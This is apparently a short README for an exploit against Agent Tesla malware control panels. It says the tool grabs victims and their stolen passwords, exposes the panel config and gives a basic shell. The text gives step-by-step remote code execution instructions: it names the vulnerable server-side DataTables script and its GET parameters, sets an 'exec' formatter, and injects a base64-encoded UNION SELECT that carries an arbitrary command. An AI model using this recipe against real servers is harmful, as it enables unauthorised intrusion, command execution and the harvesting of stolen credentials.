Agent-Tesla-Exploit
Exploits the Datatables demo unsanatized get paramerters to query database and run code remotly
Currently:
- Grabs Victims
- Grabs Victim Passwords
- Exposes Panel Config
- Basic Shell
How to use the RCE on your own
The file WebServer/server_side/scripts/server processing has 4 get paramerters:
table: Database Tableprimary: Database Primary Keyclmns: Columns as sanatized array & optional formatterwhere: SQL Where statment encoded in base64
To use, query WebServer/server_side/scripts/server processing with vaild table and primary paramerters
(i use passwords and password_id) and clmns as the sanatized version of:
[array("db" => "[Vailed Column]", "dt" => "username","formatter" => "exec")]and the where paramerter to the base64 equlivant of:
1=1 UNION SELECT "[your command here]"